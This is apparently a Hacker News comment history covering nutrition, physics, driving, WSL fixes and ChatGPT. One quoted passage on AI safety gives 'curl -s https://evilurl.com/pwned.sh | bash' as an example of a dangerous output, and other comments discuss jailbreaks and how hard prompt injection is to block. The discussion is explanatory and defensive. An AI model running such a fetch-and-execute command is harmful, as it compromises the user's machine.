Hacker Newsnew | past | comments | ask | show | jobs | submit | blueorange8's commentslogin

I don't either - not sure why noone has commented on this as far as i can see


My understanding is that you need a balance between omega 6 and omega 3 and omega 6 is not necessarily bad if its the right ratio between 6 and 3


This is not necessary a rebuttal, but I definitely have the same experience with coming up with creative ideas when I go walking or hiking without weed. I think walking is a great way to get your subconscious working effectively on something.


I didn't realize it was kinetic energy, I thought most of the weight of an atom was due to the strong nuclear force


According to this article [0], you're right:

> This property of the strong nuclear force is known as asymptotic freedom, and the particles that mediate this force are known as gluons. Somehow, the energy binding the proton together, the other 99.8% of the proton's mass, comes from these gluons.

[0] https://www.forbes.com/sites/startswithabang/2016/08/03/wher...


Yep, that’s correct. I misspoke (should have said “not due to rest mass”). You can think of this by analogy with the Coulomb Hamiltonian—it is the sum of a kinetic term and an electromagnetic potential term. With the nucleus, it’s similar except the potential term corresponds to the strong force and is even much higher than the kinetic term as you say.


If you guys think Chatgpt and gpt-4 are static you haven't been using it. The answers change constantly (and not because of the inherent randomness of the response but openai is constantly making it "safer" and improving it's output via humans) - basically when any article comes out saying "Chatgpt can't solve X puzzle) within a day suddenly it can solve that puzzle perfectly. I can't tell you how many jailbreaks just suddenly stopped working after being published on Reddit.


> If you guys think Chatgpt and gpt-4 are static you haven't been using it

The bottom of ChatGPT highlights which version is being used of GPT-4 and supposedly what version of ChatGPT it is.

> ChatGPT Mar 23 Version. (https://help.openai.com/en/articles/6825453-chatgpt-release-...)

It's possible to change the output both by tuning the parameters of the model and also client-side by doing filtering, adjusting the system prompt and/or adding/removing things from the user prompt. It's very possible to change the resulting answers without changing the model itself. This is noticeably in ChatGPT, as what you say is true, the answers change from time to time.

But when using the API, you get direct access to the model, parameters, system prompt and user prompts. If you give it a try to use that, you'll notice that you'll be getting the same answers as you did before as well, it doesn't change that often and hasn't changed since I got access to it.


This kind of stuff is likely done without changing model parameters and instead via filtering on the server and prompt engineering. One day is simply too short to train and evaluate the model on a new fine tuned task.


I'm assuming the model has a hand writtn "prefilter" and "postfilter" which both modifies any prompt going in and the token that are spit out? If they discover that the model has problems with prompts phrased a certain way for example, it would be very easy to add a transform that converts prompts to a better format. Such filters and transforms could be part of a product sitting on top of the GPT4-model without being part of the model itself? As such, they could be deployed every day. But tracking changes in those bits wouldn't give any insight into the model itself only how the team works to block jailbreaks or improve corner cases.


I think improved filtering for jailbreaks is very unlikely to correspond to the kinds of model improvements that would result in drawing a better unicorn.


In fact the more safeguards the dumber the model gets, as they published.

Which is very interesting. You already have a model that consumes nearly the entire internet with almost no standards or discernment, whereas a smart human is incredibly discerning with information (I’m sure you know what % of internet content that you read is actually high quality, and how even in the high quality parts it’s still incredibly tricky to get figure out good stuff - not to mention that half the good stuff is actually buried in low quality pools). But then you layer in political correctness and dramatically limit the usefulness.


I believe that, when doing with these very large, general LLM's, there really is no practical way to protect from any 'injection' technique, short of actually removing certain strings from ever being completed by the LLM similar to as described here by andrej (which is still not really 100% unfortunately): https://colab.research.google.com/drive/1SiF0KZJp75rUeetKOWq...

*AI Safety:* What is safety viewed through the lens of GPTs as a Finite State Markov Chain? It is the elimination of all probability of transitioning to naughty states. E.g. states that end with the token sequence `[66, 6371, 532, 82, 3740, 1378, 23542, 6371, 13, 785, 14, 79, 675, 276, 13, 1477, 930, 27334]`. This sequence of tokens encodes for `curl -s https://evilurl.com/pwned.sh | bash`. In a larger environment where those tokens might end up getting executed in a Terminal that would be problematic. More generally you could imagine that some portion of the state space is "colored red" for undesirable states that we never want to transition to. There is a very large collection of these and they are hard to explicitly enumerate, so simple ways of one-off "blocking them" is not satisfying. The GPT model itself must know based on training data and the inductive bias of the Transformer that those states should be transitioned to with effectively 0% probability. And if the probability isn't sufficiently small (e.g. < 1e-100?), then in large enough deployments (which might have temperature > 0, and might not use `topp` / `topk` sampling hyperparameters that force clamp low probability transitions to exactly zero) you could imagine stumbling into them by chance."


The way I think about this is that we need to treat AIs as human employees that have a chance of going rogue, either because of hidden agendas or because they've been deceived. All the human security controls then apply: log and verify their actions, don't give them more privileges than necessary, rate limit their actions, etc.

It's probably impossible to classify all possible bad actions in a 100% reliable manner, but we could get quite far. For example detecting profanity should be as simple as filtering the output through a naive Bayesian classifier. Everything that's left would then be a question of risk acceptance.


That's a good point, we can always filter the output externally like SQL injection checking


Do wsl --update as administrator

If doesn't work the first time try a few times


> If doesn't work the first time try a few times

Windows sounds like it hasn’t changed much after all.


It depends, does the process also require restarting the system for user app config changes?


Works. Thanks.


This isn't an example of a coding problem, but just yesterday we had a very difficult technical problem come up that one of our partners, a very large IT company couldn't solve. None of our engineers knew how to solve it after trying for a few days. I would say I'm an expert in the industry and have been doing this over 20 years as a developer. I thought I knew the best way to solve it, but I wasn't sure exactly. I asked ChatGPT(GPT-4) and the answer it gave, although not perfect in every way, gave pretty much exactly the method we needed to solve the issue.

It's a bit scary because knowing this stuff is sort-of our secret sauce and GPT-4 was able to give an even better answer than I was able to give. It helped us out a lot. We are now taking the solution back to the customer and will be implementing it.

A few additional thoughts:

1. I knew exactly what type of question to ask it to get the right answer (i.e. if someone used a different prompt maybe they would get a different answer) 2. I knew immediately that the answer it gave was what we needed to implement. Some parts of the answer were not helpful or misleading and i was able to disregard those parts. Maybe someone else would have to take more time figuring it out.

I imagine future versions of GPT will be better at both points.


this is exactly the kind of post that folks who say "oh - it wont take our jobs - our jobs are safe (way too advanced for silly AI)" - need to be reading. You're an expert, and it answered an expert question, and your colleagues couldnt do it either...after a few days...and this is just early days.


I don't think this is the take away. I'm in a similar situation as the GP, but the crux is that we still need people to make the decisions on what needs to happen - the computer 'just' helps with the 'how'. You need to be a domain expert to be able to ask the right questions and pick out the useful parts from the results.

I'm also not so worried about 'oh but the machines will keep getting better'. I mean, they will, but the above will still remain true, at least until we get to the point where the machines start to make and drive decisions on their own. Which we'll get to, but by that point, I/we will have bigger problems than computers being better at programming than I am.


I look at it differently. If what we've been writing can be replaced by a machine, that leaves us with coming up with more creative solutions. We can now spend our time more usefully, I think!


Unfortunately this seems to be true of a lot of people that don't have tesla's as well ;)


Even if you have proper training to get your license (most people here didn't even get that) you only learn to drive while actually doing it.


Where I live now, getting a licence is pretty hard.

You take a theory exam (which you actually do have to study a bit for) on the rules of driving.

This gets you a learning permission, that allows you to drive but only with a fully licences driver in the car supervising.

You then have to take a minimum of 12 driving lessons with an approved instructor, recorded in a log book, before you can take the driving practical exam.

You then take the driving practical exam, which involves driving in the approved fashion around a public area. This has a surprisingly high failure rate - "wrong hand position" on wheel, not looking around enough, looking around too much, etc all will get you a fail.

Assuming you pass, you are then a "novice" driver (have to display "N" plates) for two years and pay an incredibly high insurance premium.

Despite all this "barriers to entry", most people here are terrible drivers lol


The issue seems to be many people don't learn even then.


And that is why we need AI assist in cars. With that said, where I'm from (Europe) most people drive "stick". That is, until recently. Now most new drivers are learning on auto or AI assisted vehicles. Is it better or worse? It'll definitively lead to fewer accidents. But driving stick is kinda cool tho, imho xD And I'm sure it also give you a better intuition about how a gear box actually works.


Technically very true, stick driving will give you a better feeling of what your engine actually can deliver. However this knowledge does very little to improve road safety, so my bet is still on AI support. Not sure of the English terminology but "basic" stuff like lane protection or tiredness detection helped me a few times - and finally taught me a lesson.


> However this knowledge does very little to improve road safety

I think this would depend on the environment. If you live in a dry, relatively flat area and you mostly drive there, you're probably right, marginal difference in road safety.

But if you live in a country that has long winters or lots of mountains, having control over the engine is a integral part of staying safe on the roads.


I live rural, wicked winters. I never buy a stick car because you need two arms and two feet to drive it. So if you get hurt, you are pretty stuck for a while until your arm or leg get better.


Where I'm from most cars are also stick, but I got my license years ago but since then I've only driven twice: once with stick and once automatic, and I have to say, automatic is so much easier to learn that I don't know why we're all still getting licenses or buying manual cars. It must be stubbornness and the slight price difference because in reality automatic is just much more practical.


I think manual gearboxes are more durable. Especially when most autos today are the CVT type which break quite often I heard. Mind you the newer manual gearboxes are usually 8 or 10 speed which is going to be less reliable because all the cogs are smaller thus weaker, and you have to change gear twice as much.

One of my vehicles even has the tranny cooler and the radiator in one unit and is prone to cracking, leading to running radiator fluid through your gearbox, destroying it. The first thing I did was install an external cooler, as the market was big enough for an aftermarket kit for such a part.

Cars are getting so much worse.


Honestly, for me, it's for driving pleasure, and for having the choice. If I’m kicked off the bus at some remote location, and all I get is an old Volvo Amazon veteran car, then I’d like to be able to drive it around. And where I’m from, you can only do that (legally) if you have the right license, which is the license for manual “stick” drive.

Other than that, it’s far less about logic, and more about the feeling of control and mastery that it gives you. True, this feeling is largely more inefficient and more prone to failure than an automatic system, but that feeling, man; that feeling is just so great!

I also live in a wintery country, with many winding roads, hills and mountains with diverse weather and road conditions. The argument was made that it’s better to drive “stick” under these conditions. However, I’m not sure the argument that manual is better for diverse conditions will hold for long, given the current advent of better AI.

I’ve already seen AI drive in very hilly and adverse terrain in the Hollywood Hills, rife with bushes hanging over junctions and pedestrians popping in and out of parked cars, and so on. Naturally, not much ice up there, but that’s a pretty difficult landscape for an AI to master, and the AI already masters it pretty well!


I own multiple cars and only one of them is an automatic, and I dread it to be honest. As in I quite often get thoughts about getting another manual instead of it, and arguably this automatic (BMW) I have is the nicest car I own, but transmission really makes it no justice.

To be fair, it is a bit older, so perhaps modern transmissions are significantly better, but any rentals I've driven were even worse, though they were lower class cars.


Ya seems he is upset he missed out


He is one of the founders of OpenAI.. Soo I don't think he has missed out?


He has no stake in the organization whatsoever. They made a total break. Presumably because Elon is a moron.


Yes, lots of evidence out there he was pushed out and is now sour.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: